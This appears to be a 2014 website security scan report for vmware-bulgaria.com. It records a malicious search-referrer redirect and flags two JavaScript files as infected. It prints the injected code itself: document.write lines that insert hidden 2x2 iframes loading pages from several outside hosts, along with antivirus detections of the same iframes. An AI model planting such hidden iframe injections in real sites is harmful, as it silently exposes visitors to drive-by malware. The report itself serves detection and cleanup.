Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://vmware-bulgaria.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: vmware-bulgaria.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: max-age=600 Connection: close Date: Tue, 16 Sep 2014 05:22:27 GMT Location: http://mdg480.mdg480marketing.com/blog/?p=5510&comment=1340832 Server: Apache Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 Expires: Tue, 16 Sep 2014 05:32:27 GMT | malicious |
Scanned pages/files
| Request | Server response | Status |
http://vmware-bulgaria.com/ | 200 OK Content-Length: 9725 Content-Type: text/html | clean |
http://vmware-bulgaria.com/data.js | 200 OK Content-Length: 3229 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1058599></iframe>');
curImage=1; var data=new Array("", "<img src='data/1.jpg'/>", "<img src='data/2.jpg'/>", "<img src='data/3.jpg'/>", "<img src='data/4.jpg'/>", "<img src='data/5.jpg'/>", "<img src='data/6.jpg'/>", "<img src='data/7.jpg'/& document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sampaointl.com/mzai.html></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tuana-store.com/eozi.html?i=1058599></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1058599 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1058599> Hidden iFrame found. The same iFrame was found in 24 websites. size: 2x2 src: http://sampaointl.com/mzai.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sampaointl.com/mzai.html> Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=89273 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=89273> Hidden iFrame found. size: 2x2 src: http://micasafoundation.org/showthread.php?sid=89273 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://micasafoundation.org/showthread.php?sid=89273> Hidden iFrame found. size: 2x2 src: http://tuana-store.com/eozi.html?i=1058599 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tuana-store.com/eozi.html?i=1058599> | ||
http://vmware-bulgaria.com/includes/swfobject.js | 200 OK Content-Length: 7689 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1058599></iframe>');
if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sampaointl.com/mzai.html></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tuana-store.com/eozi.html?i=1058599></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://micasafoundation.org/showthread.php?sid=89273 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://micasafoundation.org/showthread.php?sid=89273> Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=89273 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=89273> Hidden iFrame found. The same iFrame was found in 24 websites. size: 2x2 src: http://sampaointl.com/mzai.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sampaointl.com/mzai.html> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1058599 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1058599> Hidden iFrame found. size: 2x2 src: http://tuana-store.com/eozi.html?i=1058599 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tuana-store.com/eozi.html?i=1058599> | ||
http://vmware-bulgaria.com/fullintro.flv | 200 OK Content-Length: 300120 Content-Type: text/plain | clean |
http://vmware-bulgaria.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://vmware-bulgaria.com/data/Press_Info-WMware_New_Office.pdf | 200 OK Content-Length: 165639 Content-Type: application/pdf | clean |
http://vmware-bulgaria.com/data/Press_Info-VMware_New_Sofia_Office.doc | 200 OK Content-Length: 48640 Content-Type: application/msword | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vmware-bulgaria.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vmware-bulgaria.com/
Result: vmware-bulgaria.com is not infected or malware details are not published yet.
Result: vmware-bulgaria.com is not infected or malware details are not published yet.